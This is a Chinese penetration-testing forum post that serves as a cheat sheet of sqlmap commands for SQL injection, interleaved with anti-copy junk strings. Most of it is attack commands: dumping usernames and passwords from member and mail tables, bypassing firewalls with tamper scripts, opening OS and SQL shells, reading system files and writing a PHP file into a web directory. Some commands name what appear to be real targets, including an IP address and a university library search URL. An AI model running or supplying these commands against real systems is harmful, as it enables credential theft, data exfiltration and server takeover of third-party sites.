中国网络渗透测试联盟
标题:
sqlmap使用实例
[打印本页]
作者:
admin
时间:
2017-5-19 17:03
标题:
sqlmap使用实例
/pentest/database/sqlmap
" \* N! X4 [4 ^- G0 d
9 |, m8 r- L% c; O1 S
update :::::> in the folder after execute following order : svn update
7 Y8 C+ E+ L8 ^& @- K5 u0 \
- U5 B8 `& u8 _' ?
sqlmap.py -r 1.txt --current-db
/ E. u4 R' J; l" f" ]
9 B0 ?3 m" n' a, {! @
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
' [# G i3 |, z' w: O+ O% t5 y$ k, J
+ }4 t8 x' y/ C. v/ j
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
; q$ N; m+ Z. `- p4 \
猜解数据库
+ u% u. f ^+ `* `* E/ c4 L6 E
./sqlmap.py -u "injection-url" --dbs
1 U1 X" N. N1 o* G9 y* ?
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
' m6 j0 \* v4 v: m
! O* i% v5 r8 a0 M) l
猜解表名
9 R2 }$ @% b6 L7 [7 e
./sqlmap.py -u "injection-url" -D database_name --tables
6 o4 |$ [' v$ G
$ h. W9 q! S; _. x
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
, D3 O* D# l0 L, L% ]1 E
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
4 E; z1 u; P2 c$ r. Z! @- C/ K
/ e, n- n& a" A3 f; N9 I6 t
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
) W, `9 n) s* Y/ y6 \* i0 {7 s! i
6 i" G8 d* O9 A& F3 P. ]8 U
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
) \0 y2 n8 ?" ]# e0 J0 U$ D
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
; ? K: x3 d- s
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
% U/ F# B1 P. m. |5 |
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
' w! ~! e' U9 ?% h6 J5 u8 y% S
+ F- a# g* ]4 A
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
2 p) B) }8 Z4 k! n
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
/ n! W3 p8 ?* k
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
7 g/ V) \9 Z2 _8 E8 [3 S
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
! O3 N# y' ?: }/ m' W& E$ S: y
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
. [+ m+ p; n* @* {7 e' J; B6 b
" g6 v/ h6 V o& H
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
6 y+ D4 T( H Q8 P& |/ E
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
& o6 U6 f+ o3 o) W! O
) t! }5 C1 F7 p- l
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
3 [$ j4 b v# C
猜解列名
: q- Y! x$ i" n) K }; s- e
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
/ a4 e, L0 p4 Y: _
2 M R' j6 m+ ?: L
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
( y7 @9 G" P: D x1 |3 |; ]# i
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
, n; I3 R" f8 X) @) `& L
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
# q. |$ a7 g1 j# `% Y7 H
: F- o0 ?4 y0 k6 }
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
1 G1 [: D2 n& N" F3 X
&submit=Go
9 g: c+ S7 g+ }; B
猜解值
9 _+ {/ c, \% E1 [7 }
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
% r" w, C, p5 W
========================================================
9 O- W" y8 a0 ]' T @4 }
搜索表名中包括mana字符的
" u; \# ^4 k' a* e3 j
/sqlmap.py -u "injection-url" -T mana --search
! k Z8 R' H C& W7 _5 B0 l
返回一个交互式sql shell
0 l6 }! f: A# ` E
/sqlmap.py -u "injection-url" --sql-shell
8 M6 l0 F$ ^% |( a
读取指定文件(需权限)
- g: J: }; I! k( F T8 X
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
8 g/ O: X( x+ c* t/ T# o! Z6 @
查看当前 用户 及 数据库
6 E8 T) [' c- e7 l5 U
/sqlmap.py -u "injection-url" --current-user --current-db
# Y* c8 S; v/ a; f
本地文件 写入 远程目标绝对路径
. k. l3 z+ Q, T. M. S0 N/ l* ]
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
& m7 p V' A3 Y# _4 g
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
8 R1 V+ z: O& n3 w3 p: O# D
$ f, }- ~! L/ a! Z5 m0 f
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
5 _6 S4 R5 M8 V, S- _& l
查看某用的权限
# i. n6 T) T* q% e
/sqlmap.py -u "injection-url" --privileges -U root
% ]. D0 k _- x; J
查看当前用户是否为dba
6 N2 @- j. d* x. { H
/sqlmap.py -u "injection-url" --is-dba
; x3 L% E- c/ h3 x7 P
读取所有数据库用户或指定数据库用户的密码
" X e) a( D" E- z/ a
sqlmap.py -r 1.txt --users --passwords
. k' x% S4 \4 E3 e) C+ _
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
+ K# v; M# \5 H! c8 {. T
3 M% X+ F2 }$ s- \% F/ k4 F
/sqlmap.py -u "injection-url" --passwords -U root
3 r7 x) z' s# K( N
' @( t0 o$ H* g1 c' ^) @
--start&&--stop 与 --first&&--last 的区别
* V7 `/ I5 T! e7 z8 \5 c" a4 \+ t4 N
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
9 x8 X3 i. t# s
$ m8 Z* H; o% J
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
; K, Z8 ~! T! S+ u5 G
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
2 l4 g0 R8 |' w' ~
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
$ {* ^! V/ k& a) \ v
/ a4 h. A, R4 x
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
0 Y' a& i) u \) B% z M0 X
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
6 x3 V( p4 g$ m/ U
4 G! d' z: K2 s% S/ X6 J8 g' f
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2